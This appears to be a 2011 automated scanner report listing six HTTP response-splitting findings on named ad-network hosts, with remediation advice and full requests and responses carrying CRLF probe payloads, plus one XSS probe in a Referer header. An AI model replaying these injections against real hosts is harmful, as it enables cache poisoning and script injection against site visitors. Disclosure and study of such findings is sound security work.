CWE-113, HTTP Header Injection, Response Splitting, 0x20, DORK, Vulnerable HTTPi Hosts

CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

Report generated by XSS.CX at Mon Mar 07 19:14:18 CST 2011.

The DORK Report

Loading

1. HTTP header injection

1.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.2. http://amch.questionmarket.com/adsc/d822109/8/850797/decide.php [ES cookie]

1.3. http://bidder.mathtag.com/notify [exch parameter]

1.4. http://d.xp1.ru4.com/activity [redirect parameter]

1.5. http://udmserve.net/udm/img.fetch [dt cookie]

1.6. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]


1. HTTP header injection
There are 6 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b5b7%0d%0ad5c8147ec9d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif2b5b7%0d%0ad5c8147ec9d?0.04387316177599132 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.30secondmba.com/?sReferrer=1055855|59579496|236318404|09b5af%22-alert(document.cookie)-%2224e2525c92&referrer=N3016.FastCompany\
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif2b5b7
d5c8147ec9d:
Date: Mon, 07 Mar 2011 18:14:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.2. http://amch.questionmarket.com/adsc/d822109/8/850797/decide.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d822109/8/850797/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 2d004%0d%0a42b2b1e70c1 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d822109/8/850797/decide.php?ord=1299460728 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-1_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2; ES=2d004%0d%0a42b2b1e70c1

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:46:24 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Sun, 07-Mar-2010 01:46:23 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2; expires=Thu, 26-Apr-2012 17:46:24 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=2d004
42b2b1e70c1_822109-LFVxM-0; expires=Thu, 26-Apr-2012 17:46:24 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
1.3. http://bidder.mathtag.com/notify [exch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload 7dcd7%0d%0a8fa3617fb5d was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=7dcd7%0d%0a8fa3617fb5d&id=5aW95q2jLzEvTmpObE1tTTNOemd0WmpObE1TMDBaREF5TFRobFpUSXRNall4WkdaaE5qUTRORE5rL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81OTk1NjQ5Nzk0ODgwMDgzMi8xMTEwMjgvMTAyMDY1LzIvU2dGY0lYUXYwMXVjbks3RkRwQ25mdnlnLS1lS0VVQnZ5aG5qbHVuc1Nmby8/6s9QhZvS3kFDhwEJWzQmPIkqX1k&price=5.163917 HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=9:1297862322|3:1299090747|2:1299285586|5:1297863542|10001:1297818481|1:1297862934; ts=1299429431; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b

Response

HTTP/1.1 404 Not found
Date: Mon, 07 Mar 2011 01:39:11 GMT
Server: MMBD/3.4.5.1
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - 7dcd7
8fa3617fb5d
x-mm-host: ewr-bidder-x4
Connection: keep-alive

Request not found
1.4. http://d.xp1.ru4.com/activity [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload fae6a%0d%0afc39cba1417 was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=fae6a%0d%0afc39cba1417&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=KH-00000000549735899; M62795-52786=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 07 Mar 2011 01:49:48 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://fae6a
fc39cba1417?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close

1.5. http://udmserve.net/udm/img.fetch [dt cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The value of the dt cookie is copied into the Set-Cookie response header. The payload b5076%0d%0a866a77c7dd9 was submitted in the dt cookie. This caused a response containing an injected HTTP header.

Request

GET /udm/img.fetch?sid=3454;tid=2;ev=1;dt=2; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: udm1=6369:1:63424487863:1:3454:31:1707:63424487863:1:1|; dt=b5076%0d%0a866a77c7dd9; NSC_mc-nfejb=81e1a7ed3660

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm2=8320:1:63424489625:1:3454:795:2228:63424489625:1:2|; domain=udmserve.net; path=/; expires=Tue, 06-Mar-2012 01:47:05 GMT
Set-Cookie: dt=b5076
866a77c7dd9; domain=udmserve.net; path=/; expires=Tue, 06-Mar-2012 01: 47:05 GMT
Expires: Sun, 06 Mar 2011 01:47:05 GMT
Date: Mon, 07 Mar 2011 01:47:05 GMT
Content-Type: application/x-javascript
Server: lighttpd/1.4.28
Set-Cookie: NSC_mc-nfejb=81e1a7ed3660;expires=Mon, 07-Mar-11 01:52:05 GMT;path=/
Content-Length: 1390

{document.writeln("<script type=\"text/javascript\">");
document.writeln("var udmsid = 3454;");
document.writeln("<\/script>");
document.writeln("");
document.writeln("<script type=\"text/javascript\"
...[SNIP]...
1.6. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The value of the rurl request parameter is copied into the Location response header. The payload a2cb5%0d%0abe905bb06e5 was submitted in the rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /dmm/servlet/dmm?cturl=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bf38cca4ba9b3643a%253B12e8de46d27%2C0%253B%253B%253B4124381432%2C5RoAAMKcFwAeLkoAAAAAAAJdIAAAAAAAAgAAAAIAAAAAAP8AAAABFDnRJQAAAAAApDcQAAAAAABdnioAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzZA8AAAAAAAIAAwAAAAAAJm3kjS4BAAAAAAAAAGJkODQwYzcwLTQ4NTgtMTFlMC04ZTllLTAwMWIyNDc4M2E1OAA4nyoAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Emerriam%2Dwebster%2Ecom%252Fcreative%2Ephp%253Fpageid%253Ddictionary%2526placement%253Dmw%5Fdict%5F300%5Fbot%2526groupid%253D8308787085%2526quantseg%253Dd%253At%253A2884%253A2775%253A1799%253A1361%253A1360%253A1355%253A1353%253A1349%253A1345%253A1343%253A1340%2526keyword%253D%2526subjcode%253D%2Chttp%3A%2F%2Fwww.google.com&rurl=a2cb5%0d%0abe905bb06e5 HTTP/1.1
Host: usadmm.dotomi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rt_14200=2; DotomiUser=330200604563575498$0$875515842; rt_17100=2; DotomiSession=1_330200604563575498$0$875515842$21657678$2736; rt_1982=2; rt_19000=2; rt_15900=2; rt_14000=2; DotomiRR2018=-1$11669$1$; DotomiNet=2$DjQqblZ1RXVBDW1dBgd8WgBHKSpAJ25FCVxoWiwcJzNkew0OAQhAWwIPV0JcHwkeC2BYem5uVnVFdUENbV0GB3xaAEcjPFl7AFNdDCQGPRwoPwl9Cg4BBEJcAgdRQEtCRFtjZVpoNiETe0RzSw1gWwMEc1wCU3xvWDRSSgpJNAYWGA8qLj9mCgUIS1IDBVZFT05IXGZqXn5tdwQ1AXxCEDAMR1MUXwNVeXZiL0IeTQIiQwcBIBBkfwgACAhAXwIAXkRISElbZmVPKDsnBhkQOQJrZl8AAHZd;

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 07 Mar 2011 18:04:20 GMT
X-Name: dmm-o05
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP"
Location: http://usadmm.dotomi.com/dmm/servlet/a2cb5
be905bb06e5
Content-Length: 0
Connection: close
Content-Type: text/plain

Report generated by XSS.CX at Mon Mar 07 19:14:18 CST 2011.